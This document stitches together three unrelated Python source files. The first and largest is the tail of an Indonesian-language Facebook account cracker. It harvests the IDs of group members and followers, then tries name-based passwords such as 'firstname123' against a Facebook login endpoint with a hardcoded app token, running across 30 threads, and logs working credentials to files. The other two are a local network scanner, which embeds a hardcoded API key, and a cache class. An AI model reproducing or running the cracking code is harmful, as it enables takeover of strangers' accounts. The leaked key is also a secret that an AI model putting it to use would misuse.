data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos5
oke = open("done/grup.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos5+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} \x1b[1;96mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;96m") + j['name']
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;96m") + zowe
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;96m") + bos5
cek = open("done/grup.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos5+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos6 = j['last_name'].lower()+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos6
oke = open("done/grup.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos6+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} \x1b[1;96mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;96m") + j['name']
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;96m") + zowe
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;96m") + bos6
cek = open("done/grup.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos6+"\n")
cek.close()
cekpoint.append(zowe)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\n\033[1;94m──────────────────────────────────────────────────"
print '\033[1;97m{\033[1;96m●\033[1;97m} \033[1;96mSelesai ...'
print"\033[1;97m{\033[1;96m●\033[1;97m} \033[1;96mTotal \033[1;92mOK\033[1;97m/\x1b[1;96mCP \033[1;97m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;96m"+str(len(cekpoint))
print '\033[1;97m{\033[1;96m●\033[1;97m} \033[1;92mOK\033[1;97m/\x1b[1;96mCP \033[1;96mfile tersimpan \033[1;91m: \033[1;92mdone/grup.txt'
print 50* "\033[1;94m─"
raw_input("\033[1;97m{<\033[1;96mKembali\033[1;97m>}")
os.system("python2 cr4ck.py")
##### CRACK FOLLOW #####
def crack_follow():
toket=open('login.txt','r').read()
os.system('clear')
print logo
print 50* "\033[1;94m─"
print (" \033[1;95m●●● \033[1;97mCRACK FOLLOWERS \033[1;95m●●●")
print 50* "\033[1;94m─"
idt = raw_input("\033[1;97m{\033[1;95m●\033[1;97m} \033[1;95mID Publik/Teman \033[1;91m:\033[1;92m ")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;97m{\033[1;95m●\033[1;97m} \033[1;95mNama \033[1;91m:\033[1;92m "+op["name"]
except KeyError:
print"\033[1;97m{\033[1;91m!\033[1;97m} ID publik/teman tidak ada !"
raw_input("\n\033[1;95m[\033[1;97m<Kembali>\033[1;95m]")
menu()
except requests.exceptions.ConnectionError:
print"\033[1;97m{\033[1;91m!\033[1;97m} Tidak ada koneksi !"
keluar()
r = requests.get("https://graph.facebook.com/"+idt+"/subscribers?limit=999999&access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
print "\033[1;97m{\033[1;95m●\033[1;97m} \033[1;95mTotal ID Followers \033[1;91m:\033[1;92m "+str(len(id))
print('\033[1;97m{\033[1;95m●\033[1;97m} \033[1;95mStop Tekan CTRL+Z')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;97m{\033[1;95m●\033[1;97m} \033[1;95mCrack Berjalan "+o),;sys.stdout.flush();time.sleep(1)
print("\n\033[1;97m{\033[1;95m●\033[1;97m} \033[1;95mGunakan Mode Pesawat Jika Tidak Ada Hasil")
print ("\033[1;94m──────────────────────────────────────────────────")
##### MAIN FOLLOW #####
def main(arg):
sys.stdout.write("\r{}".format(datetime.now().strftime("\033[1;96m%H\033[1;91m:\033[1;93m%M\033[1;91m:\033[1;92m%S")));sys.stdout.flush()
global cekpoint,oks
zowe = arg
try:
os.mkdir('done')
except OSError:
pass
try:
an = requests.get('https://graph.facebook.com/'+zowe+'/?access_token='+toket)
j = json.loads(an.text)
bos1 = j['first_name'].lower()+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos1
oke = open("done/follow.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos1+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} \x1b[1;95mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;95m") + j['name']
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;95m") + zowe
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;95m") + bos1
cek = open("done/follow.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos1+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos2 = j['first_name'].lower()+'1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos2
oke = open("done/follow.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos2+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} \x1b[1;95mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;95m") + j['name']
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;95m") + zowe
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;95m") + bos2
cek = open("done/follow.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos2+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos3 = j['first_name'].lower()+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos3
oke = open("done/follow.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos3+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} \x1b[1;95mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;95m") + j['name']
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;95m") + zowe
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;95m") + bos3
cek = open("done/follow.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos3+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos4 = j['last_name'].lower()+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos4
oke = open("done/follow.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos4+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} \x1b[1;95mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;95m") + j['name']
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;95m") + zowe
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;95m") + bos4
cek = open("done/follow.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos4+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos5 = j['last_name'].lower()+'1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos5
oke = open("done/follow.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos5+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} \x1b[1;95mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;95m") + j['name']
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;95m") + zowe
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;95m") + bos5
cek = open("done/follow.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos5+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos6 = j['last_name'].lower()+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos6
oke = open("done/follow.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos6+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} \x1b[1;95mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;95m") + j['name']
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;95m") + zowe
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;95m") + bos6
cek = open("done/follow.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos6+"\n")
cek.close()
cekpoint.append(zowe)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\n\033[1;94m──────────────────────────────────────────────────"
print '\033[1;97m{\033[1;95m●\033[1;97m} \033[1;95mSelesai ...'
print"\033[1;97m{\033[1;95m●\033[1;97m} \033[1;95mTotal \033[1;92mOK\033[1;97m/\x1b[1;95mCP \033[1;97m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;95m"+str(len(cekpoint))
print '\033[1;97m{\033[1;95m●\033[1;97m} \033[1;92mOK\033[1;97m/\x1b[1;95mCP \033[1;95mfile tersimpan \033[1;91m: \033[1;92mdone/follow.txt'
print 50* "\033[1;94m─"
raw_input("\033[1;97m{<\033[1;95mKembali\033[1;97m>}")
os.system("python2 cr4ck.py")
##### USERNAME ID ####
def user_id():
os.system('clear')
print logo
print 50* "\033[1;94m─"
ling = ('https://www.facebook.com/')
url = ling+raw_input("\033[1;97m{\033[1;95m×\033[1;97m} Username : ")
idre = re.compile('"entity_id":"([0-9]+)"')
page = requests.get(url)
print idre.findall(page.content)
raw_input("\n\033[1;95m[\033[1;97m<Kembali>\033[1;95m]")
menu()
##### PERBARUI #####
def perbarui():
os.system("clear")
print logo
print "\033[1;94m──────────────────────────────────────────────────"
jalan ("\033[1;92mMemperbarui Script ...\033[1;93m")
os.system("git pull origin master")
raw_input("\n\033[1;94m{\033[1;97m<Kembali>\033[1;94m}")
os.system("python2 cr4ck.py")
if __name__=='__main__':
menu()
masuk()
|
netscan.py | # -*- coding: utf-8 -*-
#!/usr/bin/env python3
# Authors:
# Julio Costella Vicenzi
# Yuri Alves
# Lucas Pittella
import os # cmd line programs
import time # for sleep()
import ipaddress
import requests
import subprocess
import multiprocessing
from datetime import datetime # for scan date
import argparse
import jhistoric
# netscan scans and logs the current connected network
# and warns of new devices or offline devices
# dependencies:
# package iproute2 (linux) for ip
# filters a list of string removing whitespace and empty strings
def filter_strings(string_list):
sl = string_list
sl = [ filter_string(s) for s in sl ]
if "" in sl:
sl.remove("")
return sl
def filter_string(s):
s = s.replace(" ", "") \
.replace("\n", "") \
.replace("\t", "") \
.replace("[", "") \
.replace("]", "") \
.replace("'", "")
return s
# a single device in the network. Saves info and current time
class NetworkDevice:
def __init__(self, ip, mac, UP=True, vendor=None):
self.ip = ip
self.mac = mac
self.UP=UP
self.vendor = self.get_api_vendor() if vendor == None else vendor
self.set_router()
self.first_scan_date = datetime.now()
self.snmp_enabled = self.check_snmp_available()
# uses cmd line to check if IP has router flag
def set_router(self):
# check if router flag is UG, else consider device as host
router_flag = filter_string(os.popen("route -n |"
"grep "+str(self.ip)+
"| awk '{print $4}' | head -1")
.read())
self.router = (router_flag == "UG") # if flag is UG, device is router
# uses API to check vendor based on mac addr
def get_api_vendor(self):
url = "https://api.macvendors.com/"
api_key = " \ -H \"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiIsImp0aSI6IjYwNDI4NTNjLWE2ODEtNGJjMC1hYWEwLTQ4NmViNjg4YzY5MyJ9.eyJpc3MiOiJtYWN2ZW5kb3JzIiwiYXVkIjoibWFjdmVuZG9ycyIsImp0aSI6IjYwNDI4NTNjLWE2ODEtNGJjMC1hYWEwLTQ4NmViNjg4YzY5MyIsImlhdCI6MTYwNTg1NDQyMywiZXhwIjoxOTIwMzUwNDIzLCJzdWIiOiI3OTM0IiwidHlwIjoiYWNjZXNzIn0.0QcT4oFqWzDltiFT2TUfindClv4nCANiJoqtoQgf4xJWz1hBMZTqpLeNcpJWo2qmXaMubLkIWtn59-qVMAc98Q\""
try:
response = requests.get(url+self.mac+api_key)
except Exception as e:
print(e)
if response.status_code != 200:
vendor = "Unknown"
else:
vendor = response.content.decode()
return vendor
# checks if the device can be reache by a snmp call
# this only checks for a public string
def check_snmp_available(self):
try:
# this calls raises an exception on fail
subprocess.check_call(['snmpget','-v', '2c', '-c', 'public', str(self.ip), '1'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
return True
except:
return False
# prints current device state as a warning of changed state
def report_changed_state(self):
print("Device changed to ", "UP" if self.UP else "DOWN" , " !")
self.print()
def print(self):
print("Type: " + ("Router" if self.router else "Host"))
print("IP: " + str(self.ip))
print("MAC: " + self.mac)
print("Vendor: ", self.vendor)
print("State: ", "UP" if self.UP else "DOWN")
print("SNMP: ", "Enabled" if self.snmp_enabled else "Disabled")
print("First scanned at: ", self.first_scan_date.strftime("%d/%m/%Y %H:%M:%S"))
class NetworkScanner:
# network_addr must include subnet mask in the x.x.x.x/m format
# when argument is default, ip is used to retrieve the subnet mask
# scan period defines the time between network scans in (unit of time)
def __init__(self, network_addr=None):
if(network_addr==None):
# head -1 used to ensure only a single ip address is retrieved
network_addr = filter_string(os.popen("ip -o -f inet addr show"
"| awk \'/scope global/ {print $4}\' "
"| head -1").read())
try:
# get the base network address based on local ip and mask (x.x.x.x/m)
# strict false makes the constructor calculate the base network ip
self.network_addr = ipaddress.ip_network(network_addr, strict=False)
except ValueError:
print("Invalid network address. Check your internet connection")
exit()
# if the discovery history json file, not exists, create
if not os.path.exists('discovery_history.json'):
open('discovery_history.json', 'w+').write('[\n\n]')
# TODO: open JSON file and read already scanned devices
self.scanned_devices = [] # list contains history of every device ever scanned
self.current_scanned_devices = [] # list of current scanned devices
# network changes from last scan
self.new_online_devices_count = 0
self.new_offline_devices_count = 0
# does a continuos network scan periodically
# scan_period = number of seconds between each scan
def periodic_scan(self, scan_period=30):
print("Performing periodic network device scan on "+str(self.network_addr)+
" every "+str(scan_period)+" seconds")
# continuosly scan
while True:
self.single_scan()
# TODO: update log with scanned devices
if self.new_online_devices_count > 0:
print(str(self.new_online_devices_count)+" devices are now online!")
if self.new_offline_devices_count > 0:
print(str(self.new_offline_devices_count)+" devices are now offline!")
#self.print_scanned_devices()
time.sleep(scan_period)
# ------------ network scan methods ------------------
# scans the network for available devices
# updates scanned_devices with new devices and their state
# updates currrent_scanned_devices with the devices found
def single_scan(self):
print("[--Scanning--]")
pinged_ips = self.ping_sweep()
addrs_dict = self.get_macs(pinged_ips)
self.update_scanned_devices(addrs_dict)
if not self.current_scanned_devices:
print("No connected devices found! Check your connection")
print("[--Scan finished--]")
# pings every possible ip in the network based on
# self.max_number_of_devices
# returns IPs that could be pinged
def ping_sweep(self):
# ping job used for multiprocessor
def ping_job(job_q, results_q):
while True:
ip = job_q.get()
if ip is None:break
try:
subprocess.check_call(['ping','-c1',ip],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
results_q.put(ip)
except: pass
#Create queue for multiprocess
jobs,results = multiprocessing.Queue(),multiprocessing.Queue()
# Create the process to execute ping_sweep
pool = [multiprocessing.Process(target=ping_job, args=(jobs,results))
for _ in self.network_addr.hosts()]
# Start the process
for p in pool: p.start()
# Start ping in host
for ip in self.network_addr.hosts():
jobs.put(str(ip))
for p in pool: jobs.put(None)
# Join all
for p in pool: p.join()
# convert queue to list and convert to ipaddess.ip_address
pinged_ips = []
while not results.empty():
pinged_ips.append(ipaddress.ip_address(results.get()))
return pinged_ips
# call arp on ip and return the corresponding mac address
def get_mac_by_arp(self, ip):
# get only the first device, since multiple interfaces might be connected
# to the same device.
mac = filter_string(str(os.popen("ip neigh show "+str(ip)+" | awk \'{print $5}\' "
"| head -1").read()))
if mac == "":
raise ValueError("Could not find MAC addr for IP: "+str(ip)+" via ARP")
return mac
# local mac adddr cannot be resolved via arp
def get_local_mac(self, ip):
# get the interface associated with the ip
grep_ip = str(ip) + "/" # this is necessary for grep
ip_interface = filter_string(str(os.popen("ip addr show"
"| grep "+grep_ip+" | awk \'{print $NF}\'").read()))
# get interface mac
mac = filter_string(str(os.popen("ip link show "+ip_interface+""
"| awk \'{print $2}\' | tail -n +2").read()))
if mac == "":
raise ValueError("Could not find MAC addr for local IP: "+str(ip) + " via ip link")
return mac
# returns a dictionary with mac as keys and ip as items
# TODO: verify macs could actually be retrieved.
def get_macs(self, pinged_ips):
addrs_dict = {}
# local ips mac addr cannot be resolved via arp
local_ips = self.get_local_ips()
for ip in pinged_ips:
mac = self.get_local_mac(ip) if ip in local_ips else self.get_mac_by_arp(ip)
# add ip mac pair
addrs_dict[mac] = ip
return addrs_dict
def update_scanned_devices(self, addr_dict):
self.new_offline_devices_count = 0
self.new_online_devices_count = 0
# start by checking if any of the devices went offline
self.remove_offline_devices(addr_dict)
# addr_dic should now only contain devices
# that were not online. We first check if they are in scanned_devices
# if not, they are added to both current_scanned_devices and scanned_devices
self.add_devices(addr_dict)
self.update_json()
# Checks addr_dict and compares with current scanned devices
# removes devices from list if their mac is not in the addr_dict
# removes ips from pinged list if they are found in the current scanned devices
def remove_offline_devices(self, addr_dict):
for dev in self.current_scanned_devices:
if dev.mac in addr_dict.keys():
# device is still online, check if ip is not changed
dict_ip = addr_dict[dev.mac]
if dict_ip != dev.ip:
print("IP on device changed from "+str(dev.ip)+" to "+str(dict_ip)+" !")
dev.ip = dict_ip
dev.print()
# delete mac ip pair, since they already exist and are still online
del addr_dict[dev.mac]
else:
# device is now offline
self.new_offline_devices_count += 1
dev.UP = False
dev.report_changed_state()
self.current_scanned_devices.remove(dev)
# check self.scanned_devices for ips in pinged_ips
# to see if any of the offline devices went online
def add_devices(self, addr_dict):
for dev in self.scanned_devices:
if dev.mac in addr_dict.keys():
# mac already exists in past scanned devices
# TODO: refatorar código repetido
dict_ip = addr_dict[dev.mac]
if dict_ip != dev.ip:
print("IP on device changed from "+str(dev.ip)+" to "+str(dict_ip)+" !")
dev.ip = dict_ip
dev.UP = True
dev.report_changed_state()
# add device to current scanned devices
self.current_scanned_devices.append(dev)
del addr_dict[dev.mac]
# the remaning devices must be new
for mac, ip in addr_dict.items():
self.add_new_device(ip, mac)
# creates NetworkDevice object from ip and append to lists
def add_new_device(self, ip, mac):
self.new_online_devices_count += 1
# checks if mac is in vendor_dict, else pass None as vendor
dev = NetworkDevice(ip, mac)
self.scanned_devices.append(dev)
self.current_scanned_devices.append(dev)
print("New Device: ")
dev.print()
# this must be called every time
# since one of the machine's interfaces might go offline
def get_local_ips(self):
local_ips = os.popen('hostname -I').read()
local_ips = local_ips.split(" ")
local_ips = filter_strings(local_ips)
local_ips = [ipaddress.ip_address(ip) for ip in local_ips]
return local_ips
# ---------- vendor methods ------------
# this is only used if reading MACs from file. Not currently in use
def read_vendor_file(self):
# tab separated file
with open("MACS.txt") as f:
lines = f.readlines()
vendor_dict = {}
for line in lines:
mac, vendor = line.split(",", 1)
vendor_dict[mac] = vendor
return vendor_dict
# get the first 6 bytes of mac address
def get_mac_vendor_bytes(self, mac):
mac = mac.replace("-", "") \
.replace(":", "") \
.replace(".", "")
return mac[:6]
# ---------- JSON methods -----------------
def update_json(self):
for dev in self.scanned_devices:
dev_dict = {
"MAC": dev.mac,
"IP": format(dev.ip),
"UP": dev.UP,
"VENDOR": dev.vendor,
"ROUTER": dev.router,
"FSCAN_DATE": format(dev.first_scan_date)
}
jhistoric.update_historic('discovery_history.json', dev_dict)
# ---------- Utility methods --------------
def print_scanned_devices(self):
print("List devices from last scan:")
for dev in self.current_scanned_devices:
dev.print()
print("-"*30)
def print_device_history(self):
print("List of every scanned device in the network")
for dev in self.scanned_devices:
dev.print()
print("-"*30)
def get_args():
def bigger_than_zero(string):
value = int(string)
if value < 1:
raise argparse.ArgumentTypeError("Period must be an integer bigger than zero")
return value
parser = argparse.ArgumentParser(description="A periodic scan script.")
parser.add_argument("-p", dest="period",
help="Determines the time between each scan in seconds",
default=10,
type=bigger_than_zero, # check if int is positive
required=False
)
parser.add_argument("-n", dest="net_addr",
help="The network ip and subnet mask in the format X.X.X.X/M",
type=ipaddress.ip_network,
required=False
)
parser.add_argument("-s", dest="single_scan",
help="Perform network scan only once",
action="store_true"
)
return parser.parse_args()
def main():
print("NETSCAN - network discovery and management tool")
print("Use -h for options")
cmd_args = get_args()
ns = NetworkScanner(cmd_args.net_addr)
if cmd_args.single_scan:
print("Perfoming scan only once.")
ns.single_scan()
else:
ns.periodic_scan(cmd_args.period)
if __name__ == "__main__":
main()
|
scheduler_cache.py | import logging
import threading
from copy import deepcopy
from apscheduler.schedulers.blocking import BlockingScheduler
from readerwriterlock import rwlock
from friend_rating_server.util.config import get_config
class SchedulerCache(object):
def __init__(self, func, expire=7200):
self.scheduler = BlockingScheduler()
self.data = dict()
self.func = func
self.lock = rwlock.RWLockFairD()
self.scheduler.add_job(self.__gao, 'interval', seconds=expire)
threading.Thread(target=self.scheduler.start).start()
SchedulerCache.objects.append(self)
def get(self, key):
update = False
with self.lock.gen_rlock():
value = self.data.get(key)
if value is None:
logging.info(f'start loading key {key}')
value = self.func(key)
logging.info(f'end loading key {key}')
update = True
if update:
with self.lock.gen_wlock():
if len(self.data) > get_config('scheduler_cache.max_size', 100000):
self.data.clear()
self.data[key] = value
logging.debug(self.data)
return deepcopy(value)
